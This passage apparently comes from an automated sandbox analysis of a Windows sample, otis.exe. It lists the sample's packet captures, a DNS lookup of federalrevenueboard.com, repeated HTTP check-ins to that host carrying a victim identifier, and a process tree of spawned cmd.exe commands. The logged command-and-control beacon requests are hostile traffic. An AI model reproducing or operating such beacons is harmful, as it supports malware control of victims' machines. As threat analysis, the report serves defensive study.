Nov 13, 2024 08:05:47.227291107 CET	6969	49751	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:47.227391958 CET	49751	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:47.228164911 CET	49751	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:47.233072042 CET	6969	49751	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:47.249573946 CET	49752	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:47.254466057 CET	9314	49752	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:47.254539967 CET	49752	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:47.254683018 CET	49752	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:47.259816885 CET	9314	49752	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:48.140949011 CET	9314	49752	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:48.151346922 CET	9314	49752	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:48.151427984 CET	49752	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:48.153662920 CET	49752	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:48.159076929 CET	9314	49752	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:48.159135103 CET	49752	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:48.194674969 CET	49753	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:48.199620962 CET	6969	49753	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:48.199691057 CET	49753	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:48.208834887 CET	49753	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:48.213628054 CET	6969	49753	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:48.246861935 CET	49753	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:48.251697063 CET	6969	49753	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:48.251739979 CET	49753	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:48.256521940 CET	6969	49753	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:49.140047073 CET	6969	49753	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:49.140131950 CET	49753	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:49.140973091 CET	49753	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:49.145850897 CET	6969	49753	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:49.171530962 CET	49754	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:49.176357031 CET	9314	49754	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:49.176445007 CET	49754	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:49.176573038 CET	49754	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:49.181291103 CET	9314	49754	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:50.100148916 CET	9314	49754	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:50.100519896 CET	49754	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:50.116837025 CET	9314	49754	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:50.116945028 CET	49754	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:50.155239105 CET	49755	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:50.160063982 CET	6969	49755	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:50.160249949 CET	49755	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:50.172499895 CET	49755	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:50.177330971 CET	6969	49755	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:50.222919941 CET	49755	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:50.227796078 CET	6969	49755	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:50.227876902 CET	49755	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:50.232695103 CET	6969	49755	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:51.108321905 CET	6969	49755	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:51.108402014 CET	49755	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:51.109472990 CET	49755	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:51.114336967 CET	6969	49755	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:51.140381098 CET	49756	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:51.145184994 CET	9314	49756	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:51.145275116 CET	49756	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:51.145406008 CET	49756	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:51.150119066 CET	9314	49756	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:52.040460110 CET	9314	49756	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:52.051599979 CET	9314	49756	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:52.051667929 CET	49756	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:52.051727057 CET	49756	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:52.056955099 CET	9314	49756	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:52.057007074 CET	49756	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:52.139503956 CET	49757	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:52.144320965 CET	6969	49757	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:52.144433975 CET	49757	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:52.153333902 CET	49757	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:52.158138990 CET	6969	49757	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:52.189068079 CET	49757	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:52.193962097 CET	6969	49757	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:52.194039106 CET	49757	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:52.198878050 CET	6969	49757	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:53.116219044 CET	6969	49757	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:53.116281986 CET	49757	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:53.117151976 CET	49757	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:53.121918917 CET	6969	49757	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:53.127233028 CET	49759	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:53.132031918 CET	9314	49759	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:53.132097960 CET	49759	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:53.132330894 CET	49759	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:53.137372971 CET	9314	49759	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:54.019128084 CET	9314	49759	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:54.029196978 CET	9314	49759	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:54.029257059 CET	49759	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:54.029340029 CET	49759	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:54.034960032 CET	9314	49759	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:54.035013914 CET	49759	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:58.358305931 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:58.363320112 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:58.363504887 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:58.378757000 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:58.383600950 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:58.418200970 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:58.423706055 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:58.423769951 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:58.428550959 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:06:56.503081083 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:06:56.508030891 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:04.925167084 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:04.930140018 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:17.937432051 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:17.942333937 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:35.390706062 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:35.395680904 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:36.328193903 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:36.333060980 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:41.031089067 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:41.035945892 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:45.984342098 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:45.989891052 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:50.377619028 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:50.382472992 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:07:55.953619003 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:07:55.958693981 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:08:27.423465967 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:08:27.428447008 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:08:38.406939030 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:08:38.412205935 CET	6969	49766	192.121.170.106	192.168.2.4
Nov 13, 2024 08:09:03.897557974 CET	49766	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:09:03.902609110 CET	6969	49766	192.121.170.106	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 08:05:27.021054029 CET	51053	53	192.168.2.4	1.1.1.1
Nov 13, 2024 08:05:27.148169994 CET	53	51053	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2024 08:05:27.021054029 CET	192.168.2.4	1.1.1.1	0x6b5b	Standard query (0)	federalrevenueboard.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 13, 2024 08:05:27.148169994 CET	1.1.1.1	192.168.2.4	0x6b5b	No error (0)	federalrevenueboard.com		91.132.92.231	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

federalrevenueboard.com:9314

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:27.167279005 CET	127	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314 Connection: Keep-Alive
Nov 13, 2024 08:05:28.074790001 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:27 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:29.321250916 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:30.229161978 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:30 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:31.301664114 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:32.212677002 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:32 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:33.333884001 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:34.227034092 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:34 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:35.255582094 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:36.154927969 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:36 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:37.269653082 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:38.163793087 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:38 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:43.239478111 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:44.123017073 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:44 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:45.292557955 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:46.194188118 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:46 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:47.254683018 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:48.140949011 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:48 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:49.176573038 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:50.100148916 CET	558	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:49 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close Data Raw: 7b 0a 20 20 22 52 65 71 75 65 73 74 49 64 22 3a 20 22 4d 54 6b 79 4c 6a 45 79 4d 53 34 78 4e 7a 41 75 4d 54 41 32 4f 6a 59 35 4e 6a 6b 3d 22 2c 0a 20 20 22 61 73 22 3a 20 22 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 53 69 65 72 72 61 20 56 69 73 74 61 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 22 69 73 70 22 3a 20 22 43 4f 4e 55 53 2d 59 50 47 22 2c 0a 20 20 22 6c 61 74 22 3a 20 33 31 2e 35 35 35 32 2c 0a 20 20 22 6c 6f 6e 22 3a 20 2d 31 31 30 2e 33 35 2c 0a 20 20 22 6f 72 67 22 3a 20 22 55 53 41 49 53 43 22 2c 0a 20 20 22 71 75 65 72 79 22 3a 20 22 36 2e 33 2e 32 2e 35 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 41 5a 22 2c 0a 20 20 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 20 22 41 72 69 7a 6f 6e 61 22 2c 0a 20 20 22 73 74 61 74 75 73 22 3a 20 22 73 75 63 63 65 73 73 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 22 [TRUNCATED] Data Ascii: { "RequestId": "MTkyLjEyMS4xNzAuMTA2OjY5Njk=", "as": "", "city": "Sierra Vista", "country": "United States", "countryCode": "US", "isp": "CONUS-YPG", "lat": 31.5552, "lon": -110.35, "org": "USAISC", "query": "6.3.2.5", "region": "AZ", "regionName": "Arizona", "status": "success", "timezone": "America/Phoenix", "zip": "85613"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:51.145406008 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:52.040460110 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:51 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	91.132.92.231	9314	6580	C:\Users\user\Desktop\otis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 08:05:53.132330894 CET	103	OUT	GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1 Host: federalrevenueboard.com:9314
Nov 13, 2024 08:05:54.019128084 CET	199	IN	HTTP/1.1 200 OK Server: Werkzeug/3.0.4 Python/3.10.12 Date: Wed, 13 Nov 2024 07:05:53 GMT Content-Type: application/json Content-Length: 359 Access-Control-Allow-Origin: * Connection: close

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: otis.exePID: 6580, Parent PID: 2580

General

Target ID:	0
Start time:	02:04:55
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\otis.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\otis.exe"
Imagebase:	0x2107df70000
File size:	22'016 bytes
MD5 hash:	3D922C89C5F0F8F9A738BEC3A24D0494
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 600, Parent PID: 6580

General

Target ID:	4
Start time:	02:05:27
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 928, Parent PID: 600

General

Target ID:	5
Start time:	02:05:27
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1308, Parent PID: 6580

General

Target ID:	6
Start time:	02:05:29
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 4908, Parent PID: 1308

General

Target ID:	7
Start time:	02:05:29
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5164, Parent PID: 6580

General

Target ID:	8
Start time:	02:05:31
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 5244, Parent PID: 5164

General

Target ID:	9
Start time:	02:05:31
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6024, Parent PID: 6580

General

Target ID:	10
Start time:	02:05:33
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 3152, Parent PID: 6024

General

Target ID:	11
Start time:	02:05:33
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2284, Parent PID: 6580

General

Target ID:	12
Start time:	02:05:35
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 6384, Parent PID: 2284

General

Target ID:	13
Start time:	02:05:35
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2652, Parent PID: 6580

General

Target ID:	14
Start time:	02:05:37
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 708, Parent PID: 2652

General

Target ID:	15
Start time:	02:05:37
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6584, Parent PID: 6580

General

Target ID:	16
Start time:	02:05:43
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3060, Parent PID: 6584

General

Target ID:	17
Start time:	02:05:43
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1904, Parent PID: 6580

General

Target ID:	18
Start time:	02:05:45
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /k echo smyytbFVD4:284992/user
Imagebase:	0x7ff619180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6888, Parent PID: 1904

General

Target ID:	19
Start time:	02:05:45
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

